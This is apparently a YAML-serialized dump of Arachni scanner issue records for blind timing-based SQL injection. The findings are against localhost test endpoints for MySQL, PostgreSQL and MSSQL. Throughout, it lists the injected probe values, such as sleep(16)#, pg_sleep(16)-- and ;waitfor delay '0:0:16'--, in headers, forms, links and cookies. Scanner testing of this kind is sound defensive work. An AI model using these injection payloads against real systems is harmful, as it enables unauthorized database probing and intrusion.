Cookie: cookie=cookie+value;cookie2=cookie+valuesleep(16)# response: {} name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n \ Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: [] internal_modname: BlindTimingSQLInjection internal_modname: BlindTimingSQLInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html var: User-Agent url: http://localhost:12482/mysql/header/straight elem: header method: GET name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :timeout: 11200.0 :timeout_divider: 1000 :timing_string: !binary |- c2xlZXAoX19USU1FX18pIw== :skip_orig: true :injected_orig: !binary |- c2xlZXAoMTYpIw== :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: sleep(16)# :injected: sleep(16)# :combo: User-Agent: sleep(16)# :action: http://localhost:12482/mysql/header/straight :silent: true :regexp: '' var: User-Agent url: http://localhost:12482/mysql/header/straight injected: sleep(16)# id: regexp: '' regexp_match: elem: header remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: sleep(16)# Cookie: cookie=cookie+value;cookie2=cookie+value response: {} name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n \ Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: [] internal_modname: BlindTimingSQLInjection internal_modname: BlindTimingSQLInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html var: User-Agent url: http://localhost:12482/mysql/header/append elem: header method: GET name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :timeout: 11200.0 :timeout_divider: 1000 :timing_string: !binary |- c2xlZXAoX19USU1FX18pIw== :skip_orig: true :injected_orig: !binary |- c2xlZXAoMTYpIw== :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: arachni_usersleep(16)# :injected: arachni_usersleep(16)# :combo: User-Agent: arachni_usersleep(16)# :action: http://localhost:12482/mysql/header/append :silent: true :regexp: '' var: User-Agent url: http://localhost:12482/mysql/header/append injected: arachni_usersleep(16)# id: regexp: '' regexp_match: elem: header remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: arachni_usersleep(16)# Cookie: cookie=cookie+value;cookie2=cookie+value response: {} name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n \ Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: [] internal_modname: BlindTimingSQLInjection internal_modname: BlindTimingSQLInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html var: input url: http://localhost:12482/postgresql/form/straight elem: form method: POST name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :timeout: 11200.0 :timeout_divider: 1000 :timing_string: !binary |- cGdfc2xlZXAoX19USU1FX18pLS0= :skip_orig: true :injected_orig: !binary |- cGdfc2xlZXAoMTYpLS0= :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": pg_sleep(16)-- :follow_location: true :injected: pg_sleep(16)-- :combo: !binary "aW5wdXQ=": pg_sleep(16)-- :action: http://localhost:12482/postgresql/form/straight :silent: true :regexp: '' var: input url: http://localhost:12482/postgresql/form/straight injected: pg_sleep(16)-- id: regexp: '' regexp_match: elem: form remarks: {} method: POST response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value;cookie2=cookie+value response: {} name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n \ Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: [] internal_modname: BlindTimingSQLInjection internal_modname: BlindTimingSQLInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html var: input url: http://localhost:12482/postgresql/form/append elem: form method: POST name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :timeout: 11200.0 :timeout_divider: 1000 :timing_string: !binary |- cGdfc2xlZXAoX19USU1FX18pLS0= :skip_orig: true :injected_orig: !binary |- cGdfc2xlZXAoMTYpLS0= :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": defaultpg_sleep(16)-- :follow_location: true :injected: defaultpg_sleep(16)-- :combo: !binary "aW5wdXQ=": defaultpg_sleep(16)-- :action: http://localhost:12482/postgresql/form/append :silent: true :regexp: '' var: input url: http://localhost:12482/postgresql/form/append injected: defaultpg_sleep(16)-- id: regexp: '' regexp_match: elem: form remarks: {} method: POST response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value;cookie2=cookie+value response: {} name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n \ Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: [] internal_modname: BlindTimingSQLInjection internal_modname: BlindTimingSQLInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html var: input url: http://localhost:12482/postgresql/link/straight?input=default elem: link method: GET name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :timeout: 11200.0 :timeout_divider: 1000 :timing_string: !binary |- cGdfc2xlZXAoX19USU1FX18pLS0= :skip_orig: true :injected_orig: !binary |- cGdfc2xlZXAoMTYpLS0= :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": pg_sleep(16)-- :follow_location: true :injected: pg_sleep(16)-- :combo: !binary "aW5wdXQ=": pg_sleep(16)-- :action: http://localhost:12482/postgresql/link/straight?input=default :silent: true :regexp: '' var: input url: http://localhost:12482/postgresql/link/straight?input=default injected: pg_sleep(16)-- id: regexp: '' regexp_match: elem: link remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value;cookie2=cookie+value response: {} name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n \ Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: [] internal_modname: BlindTimingSQLInjection internal_modname: BlindTimingSQLInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html var: input url: http://localhost:12482/postgresql/link/append?input=default elem: link method: GET name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :timeout: 11200.0 :timeout_divider: 1000 :timing_string: !binary |- cGdfc2xlZXAoX19USU1FX18pLS0= :skip_orig: true :injected_orig: !binary |- cGdfc2xlZXAoMTYpLS0= :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": defaultpg_sleep(16)-- :follow_location: true :injected: defaultpg_sleep(16)-- :combo: !binary "aW5wdXQ=": defaultpg_sleep(16)-- :action: http://localhost:12482/postgresql/link/append?input=default :silent: true :regexp: '' var: input url: http://localhost:12482/postgresql/link/append?input=default injected: defaultpg_sleep(16)-- id: regexp: '' regexp_match: elem: link remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value;cookie2=cookie+value response: {} name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n \ Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: [] internal_modname: BlindTimingSQLInjection internal_modname: BlindTimingSQLInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html var: cookie url: http://localhost:12482/postgresql/cookie/straight elem: cookie method: GET name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :timeout: 11200.0 :timeout_divider: 1000 :timing_string: !binary |- cGdfc2xlZXAoX19USU1FX18pLS0= :skip_orig: true :injected_orig: !binary |- cGdfc2xlZXAoMTYpLS0= :altered: !binary |- Y29va2ll :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2ll": pg_sleep(16)-- :injected: pg_sleep(16)-- :combo: !binary "Y29va2ll": pg_sleep(16)-- :action: http://localhost:12482/postgresql/cookie/straight :silent: true :regexp: '' var: cookie url: http://localhost:12482/postgresql/cookie/straight injected: pg_sleep(16)-- id: regexp: '' regexp_match: elem: cookie remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=pg_sleep(16)--;cookie2=cookie+value response: {} name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n \ Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: [] internal_modname: BlindTimingSQLInjection internal_modname: BlindTimingSQLInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html var: cookie2 url: http://localhost:12482/postgresql/cookie/append elem: cookie method: GET name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :timeout: 11200.0 :timeout_divider: 1000 :timing_string: !binary |- cGdfc2xlZXAoX19USU1FX18pLS0= :skip_orig: true :injected_orig: !binary |- cGdfc2xlZXAoMTYpLS0= :altered: !binary |- Y29va2llMg== :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2llMg==": cookie valuepg_sleep(16)-- :injected: cookie valuepg_sleep(16)-- :combo: !binary "Y29va2llMg==": cookie valuepg_sleep(16)-- :action: http://localhost:12482/postgresql/cookie/append :silent: true :regexp: '' var: cookie2 url: http://localhost:12482/postgresql/cookie/append injected: cookie valuepg_sleep(16)-- id: regexp: '' regexp_match: elem: cookie remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value;cookie2=cookie+valuepg_sleep(16)-- response: {} name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n \ Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: [] internal_modname: BlindTimingSQLInjection internal_modname: BlindTimingSQLInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html var: User-Agent url: http://localhost:12482/postgresql/header/append elem: header method: GET name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :timeout: 11200.0 :timeout_divider: 1000 :timing_string: !binary |- cGdfc2xlZXAoX19USU1FX18pLS0= :skip_orig: true :injected_orig: !binary |- cGdfc2xlZXAoMTYpLS0= :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: arachni_userpg_sleep(16)-- :injected: arachni_userpg_sleep(16)-- :combo: User-Agent: arachni_userpg_sleep(16)-- :action: http://localhost:12482/postgresql/header/append :silent: true :regexp: '' var: User-Agent url: http://localhost:12482/postgresql/header/append injected: arachni_userpg_sleep(16)-- id: regexp: '' regexp_match: elem: header remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: arachni_userpg_sleep(16)-- Cookie: cookie2=cookie+value;cookie=cookie+value response: {} name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n \ Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: [] internal_modname: BlindTimingSQLInjection internal_modname: BlindTimingSQLInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html var: User-Agent url: http://localhost:12482/postgresql/header/straight elem: header method: GET name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :timeout: 11200.0 :timeout_divider: 1000 :timing_string: !binary |- cGdfc2xlZXAoX19USU1FX18pLS0= :skip_orig: true :injected_orig: !binary |- cGdfc2xlZXAoMTYpLS0= :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: pg_sleep(16)-- :injected: pg_sleep(16)-- :combo: User-Agent: pg_sleep(16)-- :action: http://localhost:12482/postgresql/header/straight :silent: true :regexp: '' var: User-Agent url: http://localhost:12482/postgresql/header/straight injected: pg_sleep(16)-- id: regexp: '' regexp_match: elem: header remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: pg_sleep(16)-- Cookie: cookie2=cookie+value;cookie=cookie+value response: {} name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n \ Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: [] internal_modname: BlindTimingSQLInjection internal_modname: BlindTimingSQLInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html var: input url: http://localhost:12482/mssql/form/straight elem: form method: POST name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :timeout: 11200.0 :timeout_divider: 1000 :timing_string: !binary |- O3dhaXRmb3IgZGVsYXkgJzA6MDpfX1RJTUVfXyctLQ== :skip_orig: true :injected_orig: !binary |- O3dhaXRmb3IgZGVsYXkgJzA6MDoxNictLQ== :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": ;waitfor delay '0:0:16'-- :follow_location: true :injected: ;waitfor delay '0:0:16'-- :combo: !binary "aW5wdXQ=": ;waitfor delay '0:0:16'-- :action: http://localhost:12482/mssql/form/straight :silent: true :regexp: '' var: input url: http://localhost:12482/mssql/form/straight injected: ;waitfor delay '0:0:16'-- id: regexp: '' regexp_match: elem: form remarks: {} method: POST response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value;cookie2=cookie+value response: {} name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n \ Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
